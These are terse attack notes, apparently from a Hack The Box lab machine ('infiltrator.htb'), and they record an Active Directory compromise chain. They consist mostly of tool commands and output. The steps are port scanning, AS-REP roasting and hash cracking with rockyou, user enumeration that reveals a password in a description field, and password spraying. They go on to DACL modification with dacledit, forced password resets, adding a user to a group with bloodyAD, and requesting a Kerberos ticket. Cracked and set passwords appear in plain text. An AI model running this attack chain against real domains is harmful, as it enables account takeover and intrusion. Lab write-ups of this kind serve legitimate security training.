53/tcp    open  domain                                                                                                                                       
80/tcp    open  http                                                                                                                                         
88/tcp    open  kerberos-sec                                                                                                                                 
135/tcp   open  msrpc                                                                                                                                        
139/tcp   open  netbios-ssn                                                                                                                                  
389/tcp   open  ldap                                                                                                                                         
445/tcp   open  microsoft-ds                                                                                                                                 
464/tcp   open  kpasswd5                                                                                                                                     
593/tcp   open  http-rpc-epmap                                                                                                                               
636/tcp   open  ldapssl                                                                                                                                      
3268/tcp  open  globalcatLDAP                                                                                                                                
3269/tcp  open  globalcatLDAPssl                                                                                                                             
3389/tcp  open  ms-wbt-server                                                                                                                                
5985/tcp  open  wsman                                                                                                                                        
9389/tcp  open  adws                                                                                                                                         
15220/tcp open  unknown                                                                                                                                      
15230/tcp open  unknown                                                                                                                                      
49666/tcp open  unknown                                                                                                                                      
49689/tcp open  unknown                                                                                                                                      
49691/tcp open  unknown                                                                                                                                      
49694/tcp open  unknown                                                                                                                                      
49723/tcp open  unknown                                                                                                                                      
49747/tcp open  unknown                                                                                                                                      
49866/tcp open  unknown   

Users based on the names of format x.x on the website

nxc ldap infiltrator.htb -u potential_users.txt -p '' --asreproast asreproasting.txt

[email protected]:6bd465884c14ad665eb80e077cb243d6$b4f1e39d63484c5688040d5c28fff01528 e37d85665bb13890a32625d51c7a983bdceae029abaaf2fc7d6936954b88a70b762d8e842639d04196ff46649dc070bb23d1f4e7a8d65015f63035051145064efd546adb48b6b9a3ee95fdb205213 6179bf9a50102dbe79163fb1ca4b712eff70a47e55bfaed27035d2b2ed935b917dc5619a1b5364744a8ca3eb0825fe65ac395a065cd5d39ec5ec4d89e2807456f75fcf0018760613defbe348146c5 72d9ed0ad5303159a2576b6f573ae231e713e5fdd1d119ce6cc15217761489e11e663088bf5cf1dd4f8a17e7ec6802ba00d4cb9d818f334ee719fdb3211095ca1b3925d8

hashcat -a 0 asreproasting.txt /usr/share/wordlists/rockyou.txt
infiltrator.htb\\l.clark:WAT?watismypass!
[Oct 27, 2024 - 20:30:09 (PDT)] exegol-default creds # nxc ldap 10.10.11.31 -u l.clark -p 'WAT?watismypass!' --users  
SMB         10.10.11.31     445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.31     389    DC01             [+] infiltrator.htb\\l.clark:WAT?watismypass! 
LDAP        10.10.11.31     389    DC01             [*] Total of records returned 15
LDAP        10.10.11.31     389    DC01             Administrator                  Built-in account for administering the computer/domain
LDAP        10.10.11.31     389    DC01             Guest                          Built-in account for guest access to the computer/domain
LDAP        10.10.11.31     389    DC01             krbtgt                         Key Distribution Center Service Account
LDAP        10.10.11.31     389    DC01             D.anderson                     
LDAP        10.10.11.31     389    DC01             L.clark                        
LDAP        10.10.11.31     389    DC01             M.harris                       
LDAP        10.10.11.31     389    DC01             O.martinez                     
LDAP        10.10.11.31     389    DC01             A.walker                       
LDAP        10.10.11.31     389    DC01             K.turner                       MessengerApp@Pass!
LDAP        10.10.11.31     389    DC01             E.rodriguez                    
LDAP        10.10.11.31     389    DC01             winrm_svc                      
LDAP        10.10.11.31     389    DC01             lan_managment  

d.anderson is protected user (bloodhound)

[Oct 27, 2024 - 20:58:17 (PDT)] exegol-default creds # nxc smb 10.10.11.31 -u users.txt -p 'WAT?watismypass!' --users -k --continue-on-success 
SMB         10.10.11.31     445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.31     445    DC01             [-] infiltrator.htb\\Administrator:WAT?watismypass! KDC_ERR_PREAUTH_FAILED 
SMB         10.10.11.31     445    DC01             [-] infiltrator.htb\\Guest:WAT?watismypass! KDC_ERR_CLIENT_REVOKED 
SMB         10.10.11.31     445    DC01             [-] infiltrator.htb\\krbtgt:WAT?watismypass! KDC_ERR_CLIENT_REVOKED 
SMB         10.10.11.31     445    DC01             [+] infiltrator.htb\\D.anderson:WAT?watismypass! 
SMB         10.10.11.31     445    DC01             [+] infiltrator.htb\\L.clark:WAT?watismypass! 
SMB         10.10.11.31     445    DC01             [-] infiltrator.htb\\M.harris:WAT?watismypass! KDC_ERR_PREAUTH_FAILED 
SMB         10.10.11.31     445    DC01             [-] infiltrator.htb\\O.martinez:WAT?watismypass! KDC_ERR_PREAUTH_FAILED 
SMB         10.10.11.31     445    DC01             [-] infiltrator.htb\\A.walker:WAT?watismypass! KDC_ERR_PREAUTH_FAILED 
SMB         10.10.11.31     445    DC01             [-] infiltrator.htb\\K.turner:WAT?watismypass! KDC_ERR_PREAUTH_FAILED 
SMB         10.10.11.31     445    DC01             [-] infiltrator.htb\\E.rodriguez:WAT?watismypass! KDC_ERR_PREAUTH_FAILED 
SMB         10.10.11.31     445    DC01             [-] infiltrator.htb\\winrm_svc:WAT?watismypass! KDC_ERR_PREAUTH_FAILED 
SMB         10.10.11.31     445    DC01             [-] infiltrator.htb\\lan_managment:WAT?watismypass! KDC_ERR_PREAUTH_FAILED 

d.anderson has genericall on marketing digital OU, which contains e.rodriguez

image.png

add genricall + reset password

dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb'/'d.anderson':'WAT?watismypass!' -k -dc-ip 10.10.11.31
changepasswd.py -newpass 'BruhWhat123' 'infiltrator.htb'/'e.rodriguez':'aa'@'dc01.infiltrator.htb' -reset -altuser d.anderson -altpass 'WAT?watismypass!' -p kpasswd 

e.rodriguez → addself to CHIEFS [email protected] → force change password [email protected]

bloodyAD -u e.rodriguez -p BruhWhat123 -d infiltrator.htb --host 10.10.11.31 -v DEBUG add groupMember 'Chiefs Marketing' 'e.rodriguez'
changepasswd.py -newpass 'BruhWhat123' 'infiltrator.htb'/'m.harris':'BruhWhat123'@'dc01.infiltrator.htb' -reset -altuser e.rodriguez -altpass 'BruhWhat123' -p kpasswd
getTGT.py infiltrator.htb/m.harris:BruhWhat123